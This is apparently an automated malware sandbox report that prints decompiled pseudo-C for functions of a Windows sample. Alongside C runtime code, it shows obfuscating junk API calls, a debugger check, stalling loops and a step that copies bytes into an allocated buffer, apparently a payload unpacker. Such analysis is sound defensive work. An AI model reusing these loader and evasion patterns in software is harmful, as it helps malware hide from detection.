                • LoadLibraryA.KERNEL32(msimg32.dll,00000000), ref: 0040475E
                • GetProcAddress.KERNEL32(msimg32.dll,14CA3371), ref: 00404B7D
                • VirtualProtect.KERNELBASE(00000040,?), ref: 00404B9B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: AddressLibraryLoadProcProtectVirtual
                • String ID: %b5;$0P%G$IVE$Jb%$Jo $V%7($msimg32.dll$mn@$oQZ$kiu
                • API String ID: 3509694964-212567100
                • Opcode ID: 1b69801e2e1c47f8d01470eb3588a78a656ed7e9a00caf1172ac377a410d3b0b
                • Instruction ID: d3a44aa28ae360d6cecd3e3d3fe5fc0f95a76b358f466b33c7dbc3d46d96d836
                • Opcode Fuzzy Hash: 1b69801e2e1c47f8d01470eb3588a78a656ed7e9a00caf1172ac377a410d3b0b
                • Instruction Fuzzy Hash: C4B11074A0C380CFD310DF6AD48860ABBE0BBA5358F944A0CF5D55A621C3B9D989CF5B
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 59 40d47e-40d48d GetEnvironmentStringsW 60 40d493-40d496 59->60 61 40d48f-40d492 59->61 62 40d4a6-40d4af call 41017a 60->62 63 40d498-40d49d 60->63 66 40d4b4-40d4b9 62->66 63->63 64 40d49f-40d4a4 63->64 64->62 64->63 67 40d4c8-40d4d3 call 407690 66->67 68 40d4bb-40d4c7 FreeEnvironmentStringsW 66->68 67->68
                C-Code - Quality: 100%
                			E0040D47E() {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				WCHAR* _t1;
                				void* _t5;
                				void* _t18;
                				WCHAR* _t20;
                
                				_t1 = GetEnvironmentStringsW();
                				_t20 = _t1;
                				if(_t20 != 0) {
                					if( *_t20 != 0) {
                						goto L3;
                						do {
                							do {
                								L3:
                								_t1 =  &(_t1[1]);
                							} while ( *_t1 != 0);
                							_t1 =  &(_t1[1]);
                						} while ( *_t1 != 0);
                					}
                					_t13 = _t1 - _t20 + 2;
                					_t5 = E0041017A(_t1 - _t20 + 2); // executed
                					_t18 = _t5;
                					if(_t18 != 0) {
                						E00407690(_t13, _t18, _t20, _t18, _t20, _t13);
                					}
                					FreeEnvironmentStringsW(_t20);
                					return _t18;
                				} else {
                					return 0;
                				}
                			}










                0x0040d481
                0x0040d487
                0x0040d48d
                0x0040d496
                0x00000000
                0x0040d498
                0x0040d498
                0x0040d498
                0x0040d499
                0x0040d49a
                0x0040d4a0
                0x0040d4a1
                0x0040d498
                0x0040d4ab
                0x0040d4af
                0x0040d4b4
                0x0040d4b9
                0x0040d4cb
                0x0040d4d0
                0x0040d4bc
                0x0040d4c7
                0x0040d48f
                0x0040d492
                0x0040d492

                APIs
                • GetEnvironmentStringsW.KERNEL32(00000000,004071AB), ref: 0040D481
                • __malloc_crt.LIBCMT ref: 0040D4AF
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040D4BC
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: EnvironmentStrings$Free__malloc_crt
                • String ID:
                • API String ID: 237123855-0
                • Opcode ID: cbd088ef2baa2125fbfd1fa13128235225cfd181fc13ec8c056ab0adec94ce6d
                • Instruction ID: 669560d8cf408b1428bde3b8f18d8137bc47f832364722111ad980144f7813f7
                • Opcode Fuzzy Hash: cbd088ef2baa2125fbfd1fa13128235225cfd181fc13ec8c056ab0adec94ce6d
                • Instruction Fuzzy Hash: CDF0E237D141205ACA20BABA6C088BB1638DACB36A312453BF452E3280F5384D8782A8
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 71 40ad36-40ad58 HeapCreate 72 40ad5a-40ad5b 71->72 73 40ad5c-40ad65 71->73
                C-Code - Quality: 100%
                			E0040AD36(intOrPtr _a4) {
                				void* _t6;
                
                				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                				 *0x5575bc = _t6;
                				if(_t6 != 0) {
                					 *0x55927c = 1;
                					return 1;
                				} else {
                					return _t6;
                				}
                			}




                0x0040ad4b
                0x0040ad51
                0x0040ad58
                0x0040ad5f
                0x0040ad65
                0x0040ad5b
                0x0040ad5b
                0x0040ad5b

                APIs
                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040AD4B
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: CreateHeap
                • String ID:
                • API String ID: 10892065-0
                • Opcode ID: 92d4a89dd7e37ee4f013ba388895348d668f2b0bbf519285894f56519a2453ca
                • Instruction ID: 4fe2c631bc49707b8ce7c4e9bb779201910ead119c133f77b8b10fe0b68d7201
                • Opcode Fuzzy Hash: 92d4a89dd7e37ee4f013ba388895348d668f2b0bbf519285894f56519a2453ca
                • Instruction Fuzzy Hash: ACD05E36554308ABDB009F727C187623BDC9788796F008436F90DD62A0F574C550DE04
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 74 4092bd-4092bf call 40924b 76 4092c4-4092c5 74->76
                C-Code - Quality: 100%
                			E004092BD() {
                				void* _t1;
                
                				_t1 = E0040924B(0); // executed
                				return _t1;
                			}




                0x004092bf
                0x004092c5

                APIs
                • __encode_pointer.LIBCMT ref: 004092BF
                  • Part of subcall function 0040924B: TlsGetValue.KERNEL32(00000000,?,004092C4,00000000,004110FD,00557758,00000000,00000314,?,0040CF86,00557758,Microsoft Visual C++ Runtime Library,00012010), ref: 0040925D
                  • Part of subcall function 0040924B: TlsGetValue.KERNEL32(00000004,?,004092C4,00000000,004110FD,00557758,00000000,00000314,?,0040CF86,00557758,Microsoft Visual C++ Runtime Library,00012010), ref: 00409274
                  • Part of subcall function 0040924B: RtlEncodePointer.NTDLL(00000000,?,004092C4,00000000,004110FD,00557758,00000000,00000314,?,0040CF86,00557758,Microsoft Visual C++ Runtime Library,00012010), ref: 004092B2
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: Value$EncodePointer__encode_pointer
                • String ID:
                • API String ID: 2585649348-0
                • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                • Instruction ID: 03079086d5dbb9922f8ff885f5a23f300fbcfe87dfb8603d1fe0f8ea03bf3111
                • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 77 404ba5-404bb8 LocalAlloc
                C-Code - Quality: 100%
                			E00404BA5() {
                				void* _t1;
                
                				_t1 = LocalAlloc(0,  *0x557154); // executed
                				 *0x5565f8 = _t1;
                				return _t1;
                			}




                0x00404bad
                0x00404bb3
                0x00404bb8

                APIs
                • LocalAlloc.KERNELBASE(00000000,00404C26,0079A862,?,00000000), ref: 00404BAD
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: AllocLocal
                • String ID:
                • API String ID: 3494564517-0
                • Opcode ID: 8c662341844706f53f20236e2f205bdcb457a82104d9898c3155c41e847c4d4d
                • Instruction ID: 4c57335655fffe214d177a2022449932e2f7d3870bf613eb870c8571680a2754
                • Opcode Fuzzy Hash: 8c662341844706f53f20236e2f205bdcb457a82104d9898c3155c41e847c4d4d
                • Instruction Fuzzy Hash: 92B012F4045341CBD7400F90BE58B007B30A318303F400061E91041274D7340088FF10
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 44%
                			E004045DF(intOrPtr _a4) {
                				void* _v6;
                				struct _COORD _v8;
                				long _v12;
                				long _v16;
                				long _v20;
                				long _v24;
                				char _v28;
                				void* _v44;
                				struct _OVERLAPPED _v48;
                				struct _INPUT_RECORD _v68;
                				char _v132;
                				char _v2180;
                				intOrPtr _t19;
                				intOrPtr _t42;
                				void* _t45;
                				void* _t49;
                
                				if( *0x557154 == 0x37) {
                					GetLocaleInfoW(0, 0, 0, 0);
                					__imp__DebugActiveProcessStop(0, _t45, _t49);
                					_v8.X = 0;
                					asm("stosw");
                					WriteConsoleOutputAttribute(0, 0, 0, _v8,  &_v20);
                					__imp__FreeUserPhysicalPages(0,  &_v28, 0);
                					GetProcessId(0);
                					ReadConsoleInputA(0,  &_v68, 0,  &_v24);
                					WaitForMultipleObjects(0, 0, 0, 0);
                					LocalSize(0);
                					CreateDirectoryExA(0, 0, 0);
                					__imp__FindFirstVolumeMountPointW(0,  &_v2180, 0);
                					_v48.Internal = 0;
                					asm("stosd");
                					asm("stosd");
                					asm("stosd");
                					asm("stosd");
                					WriteFile(0, 0, 0,  &_v12,  &_v48);
                					ClearCommBreak(0);
                					WriteConsoleInputA(0, 0, 0,  &_v16);
                					__imp__FindActCtxSectionStringA(0, 0, 0, "kilemalikemirezedumijefomeyofunevelusafiwaxobasacuyayemexika",  &_v132);
                					CreateFileA(0, 0, 0, 0, 0, 0, 0);
                				}
                				_t19 = _a4;
                				_t42 =  *0x557568; // 0x416a1a
                				_t17 = _t19 + 0x38d6; // 0x5afe5b06
                				 *((char*)( *0x5565f8 + _t19)) =  *((intOrPtr*)(_t42 + _t17));
                				return _t19;
                			}



















                0x004045ef
                0x004045fd
                0x00404604
                0x0040460c
                0x00404613
                0x0040461f
                0x0040462b
                0x00404632
                0x00404642
                0x0040464c
                0x00404653
                0x0040465c
                0x0040466b
                0x00404673
                0x00404679
                0x0040467a
                0x0040467b
                0x0040467c
                0x00404688
                0x0040468f
                0x0040469c
                0x004046ae
                0x004046bb
                0x004046c2
                0x004046c3
                0x004046c6
                0x004046cc
                0x004046d9
                0x004046dd

                APIs
                • GetLocaleInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004045FD
                • DebugActiveProcessStop.KERNEL32(00000000), ref: 00404604
                • WriteConsoleOutputAttribute.KERNEL32(00000000,00000000,00000000,?,?), ref: 0040461F
                • FreeUserPhysicalPages.KERNEL32(00000000,?,00000000), ref: 0040462B
                • GetProcessId.KERNEL32(00000000), ref: 00404632
                • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00404642
                • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040464C
                • LocalSize.KERNEL32 ref: 00404653
                • CreateDirectoryExA.KERNEL32 ref: 0040465C
                • FindFirstVolumeMountPointW.KERNEL32(00000000,?,00000000), ref: 0040466B
                • WriteFile.KERNEL32(00000000,00000000,00000000,?,?), ref: 00404688
                • ClearCommBreak.KERNEL32(00000000), ref: 0040468F
                • WriteConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 0040469C
                • FindActCtxSectionStringA.KERNEL32(00000000,00000000,00000000,kilemalikemirezedumijefomeyofunevelusafiwaxobasacuyayemexika,?), ref: 004046AE
                • CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004046BB
                Strings
                • kilemalikemirezedumijefomeyofunevelusafiwaxobasacuyayemexika, xrefs: 004046A6
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: ConsoleWrite$CreateFileFindInputProcess$ActiveAttributeBreakClearCommDebugDirectoryFirstFreeInfoLocalLocaleMountMultipleObjectsOutputPagesPhysicalPointReadSectionSizeStopStringUserVolumeWait
                • String ID: kilemalikemirezedumijefomeyofunevelusafiwaxobasacuyayemexika
                • API String ID: 2979675291-2687294445
                • Opcode ID: 647baf5575dc9fce75978539462c2bdf85f2a723f01aa8d1a95db79e6ccd9f1c
                • Instruction ID: 15fc781cf69b3e6d03c53997b208b0251f99b9577e65a2ba4741d99fd6b10bd8
                • Opcode Fuzzy Hash: 647baf5575dc9fce75978539462c2bdf85f2a723f01aa8d1a95db79e6ccd9f1c
                • Instruction Fuzzy Hash: 2731D676402568BBD7219BA5EE0CCEF7F7CEE4A3A1B004061F649E1520D634568ACBF9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E0040730B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                				intOrPtr _v0;
                				void* _v804;
                				intOrPtr _v808;
                				intOrPtr _v812;
                				intOrPtr _t6;
                				intOrPtr _t11;
                				intOrPtr _t12;
                				intOrPtr _t13;
                				long _t17;
                				intOrPtr _t21;
                				intOrPtr _t22;
                				intOrPtr _t25;
                				intOrPtr _t26;
                				intOrPtr _t27;
                				intOrPtr* _t31;
                				void* _t34;
                
                				_t27 = __esi;
                				_t26 = __edi;
                				_t25 = __edx;
                				_t22 = __ecx;
                				_t21 = __ebx;
                				_t6 = __eax;
                				_t34 = _t22 -  *0x42c190; // 0xf0db39ac
                				if(_t34 == 0) {
                					asm("repe ret");
                				}
                				 *0x557d88 = _t6;
                				 *0x557d84 = _t22;
                				 *0x557d80 = _t25;
                				 *0x557d7c = _t21;
                				 *0x557d78 = _t27;
                				 *0x557d74 = _t26;
                				 *0x557da0 = ss;
                				 *0x557d94 = cs;
                				 *0x557d70 = ds;
                				 *0x557d6c = es;
                				 *0x557d68 = fs;
                				 *0x557d64 = gs;
                				asm("pushfd");
                				_pop( *0x557d98);
                				 *0x557d8c =  *_t31;
                				 *0x557d90 = _v0;
                				 *0x557d9c =  &_a4;
                				 *0x557cd8 = 0x10001;
                				_t11 =  *0x557d90; // 0x0
                				 *0x557c8c = _t11;
                				 *0x557c80 = 0xc0000409;
                				 *0x557c84 = 1;
                				_t12 =  *0x42c190; // 0xf0db39ac
                				_v812 = _t12;
                				_t13 =  *0x42c194; // 0xf24c653
                				_v808 = _t13;
                				 *0x557cd0 = IsDebuggerPresent();
                				_push(1);
                				E00409243(_t14);
                				SetUnhandledExceptionFilter(0);
                				_t17 = UnhandledExceptionFilter(0x40261c);
                				if( *0x557cd0 == 0) {
                					_push(1);
                					E00409243(_t17);
                				}
                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                			}



















                0x0040730b
                0x0040730b
                0x0040730b
                0x0040730b
                0x0040730b
                0x0040730b
                0x0040730b
                0x00407311
                0x00407313
                0x00407313
                0x0040d81c
                0x0040d821
                0x0040d827
                0x0040d82d
                0x0040d833
                0x0040d839
                0x0040d83f
                0x0040d846
                0x0040d84d
                0x0040d854
                0x0040d85b
                0x0040d862
                0x0040d869
                0x0040d86a
                0x0040d873
                0x0040d87b
                0x0040d883
                0x0040d88e
                0x0040d898
                0x0040d89d
                0x0040d8a2
                0x0040d8ac
                0x0040d8b6
                0x0040d8bb
                0x0040d8c1
                0x0040d8c6
                0x0040d8d2
                0x0040d8d7
                0x0040d8d9
                0x0040d8e1
                0x0040d8ec
                0x0040d8f9
                0x0040d8fb
                0x0040d8fd
                0x0040d902
                0x0040d916

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 0040D8CC
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D8E1
                • UnhandledExceptionFilter.KERNEL32(0040261C), ref: 0040D8EC
                • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D908
                • TerminateProcess.KERNEL32(00000000), ref: 0040D90F
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID:
                • API String ID: 2579439406-0
                • Opcode ID: 18b0bffd1f292d0248774a996b3f9fb8279f5c56cbca043ff5edd2f08e1bfd64
                • Instruction ID: c2be6b96099edb861a45c02c55917b5719ce01daba27f6e0b420ef6dadc24d4d
                • Opcode Fuzzy Hash: 18b0bffd1f292d0248774a996b3f9fb8279f5c56cbca043ff5edd2f08e1bfd64
                • Instruction Fuzzy Hash: 2121F0B48083089FD710DF24FD666683BB4BF6C306F4040AAE509973B1E7B05A89EF49
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040CAD1() {
                
                				SetUnhandledExceptionFilter(E0040CA8F);
                				return 0;
                			}



                0x0040cad6
                0x0040cade

                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0000CA8F), ref: 0040CAD6
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 2064de86c2562a69c35905e507b8897ae9c6421035c794b6e31e8baf579680d4
                • Instruction ID: 6ad921421b858842383045b2b961cbd4480141427b87717ea2e59f4549dde2fd
                • Opcode Fuzzy Hash: 2064de86c2562a69c35905e507b8897ae9c6421035c794b6e31e8baf579680d4
                • Instruction Fuzzy Hash: C99002B0B551558BC74557F05D4961525909A5C71375105716511E80A4DAB444445919
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 92%
                			E004093B2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                				struct HINSTANCE__* _t23;
                				intOrPtr _t28;
                				intOrPtr _t32;
                				intOrPtr _t45;
                				void* _t46;
                
                				_t35 = __ebx;
                				_push(0xc);
                				_push(0x4182b8);
                				E0040B9DC(__ebx, __edi, __esi);
                				_t44 = L"KERNEL32.DLL";
                				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                				if(_t23 == 0) {
                					_t23 = E0040CADF(_t44);
                				}
                				 *(_t46 - 0x1c) = _t23;
                				_t45 =  *((intOrPtr*)(_t46 + 8));
                				 *((intOrPtr*)(_t45 + 0x5c)) = 0x4025a0;
                				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                				if(_t23 != 0) {
                					_t35 = GetProcAddress;
                					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                				}
                				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                				 *((char*)(_t45 + 0xc8)) = 0x43;
                				 *((char*)(_t45 + 0x14b)) = 0x43;
                				 *(_t45 + 0x68) = 0x42c690;
                				E0040AEE2(_t35, 1, 0xd);
                				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                				InterlockedIncrement( *(_t45 + 0x68));
                				 *(_t46 - 4) = 0xfffffffe;
                				E00409487();
                				E0040AEE2(_t35, 1, 0xc);
                				 *(_t46 - 4) = 1;
                				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                				if(_t28 == 0) {
                					_t32 =  *0x42cc98; // 0x42cbc0
                					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                				}
                				E0040E519( *((intOrPtr*)(_t45 + 0x6c)));
                				 *(_t46 - 4) = 0xfffffffe;
                				return E0040BA21(E00409490());
                			}








                0x004093b2
                0x004093b2
                0x004093b4
                0x004093b9
                0x004093be
                0x004093c4
                0x004093cc
                0x004093cf
                0x004093d4
                0x004093d5
                0x004093d8
                0x004093db
                0x004093e5
                0x004093ea
                0x004093f2
                0x004093fa
                0x0040940a
                0x0040940a
                0x00409410
                0x00409413
                0x0040941a
                0x00409421
                0x0040942a
                0x00409430
                0x00409437
                0x0040943d
                0x00409444
                0x0040944b
                0x00409451
                0x00409454
                0x00409457
                0x0040945c
                0x0040945e
                0x00409463
                0x00409463
                0x00409469
                0x0040946f
                0x00409480

                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,004182B8,0000000C,004094ED,00000000,00000000), ref: 004093C4
                • __crt_waiting_on_module_handle.LIBCMT ref: 004093CF
                  • Part of subcall function 0040CADF: Sleep.KERNEL32(000003E8,00000000,?,00409315,KERNEL32.DLL,?,00409361), ref: 0040CAEB
                  • Part of subcall function 0040CADF: GetModuleHandleW.KERNEL32(?,?,00409315,KERNEL32.DLL,?,00409361), ref: 0040CAF4
                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004093F8
                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00409408
                • __lock.LIBCMT ref: 0040942A
                • InterlockedIncrement.KERNEL32(0042C690), ref: 00409437
                • __lock.LIBCMT ref: 0040944B
                • ___addlocaleref.LIBCMT ref: 00409469
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                • API String ID: 1028249917-2843748187
                • Opcode ID: 6734308b148e91772b4aa3cb31740699c3cdeea8a5c48ff6adbc28f782fc9a19
                • Instruction ID: b444068550ae5543cd0b7152aaeb736dd30d8a757a68a49cc65ef58145a11f46
                • Opcode Fuzzy Hash: 6734308b148e91772b4aa3cb31740699c3cdeea8a5c48ff6adbc28f782fc9a19
                • Instruction Fuzzy Hash: F5116D70940700AED720DF6AD841B9ABBE4AF44318F10852FE499B22E1CBB899418B5C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E00404F68(void* __edx) {
                				char _v32;
                				struct _CRITICAL_SECTION _v56;
                				short _v2104;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				intOrPtr _t13;
                				intOrPtr _t17;
                				void* _t38;
                				void* _t48;
                				void* _t49;
                				void* _t50;
                
                				_t47 = __edx;
                				_t55 =  *0x557154 - 0x9e;
                				if( *0x557154 == 0x9e) {
                					_push(" %s %d %f");
                					_push(0);
                					E00407004(_t38, __edx, _t48, 0, _t55);
                					E00406FC9(0);
                					_push(0);
                					E00406FF9();
                					E00405DA5( &_v56, _t55);
                					E00405A38( &_v32, _t48, "0");
                					E0040629E( &_v56, __edx, _t55,  &_v32);
                					E00405635();
                					E00405A38( &_v32, _t48, "mufuvopuvaselaxeka");
                					_push( &_v32);
                					_push(0xa);
                					E00406375( &_v56, _t47);
                					E00405635();
                					_push(0);
                					E00406F3B(_t38, _t48, 0, _t55);
                					E00406EFB( &_v32, 0, 0);
                					E00406EE5(0);
                					E00405FED( &_v56, 0, _t55);
                				}
                				_t49 = 0x2443831;
                				do {
                					_t13 =  *0x41a2e4; // 0xe2b2
                					 *0x557154 = _t13;
                					if(_t13 == 0xf) {
                						SetCriticalSectionSpinCount( &_v56, 0);
                					}
                					_t49 = _t49 - 1;
                				} while (_t49 != 0);
                				_t50 = 0x79a863;
                				do {
                					if( *0x557154 == 0x4c5) {
                						GetTextFaceW(0, 0,  &_v2104);
                						EnumTimeFormatsA(0, 0, 0);
                					}
                					_t50 = _t50 - 1;
                				} while (_t50 != 0);
                				_t17 =  *0x41a008; // 0x416a1a
                				 *0x557568 = _t17;
                				E00404BB9(_t47);
                				return 0;
                			}















                0x00404f68
                0x00404f74
                0x00404f7f
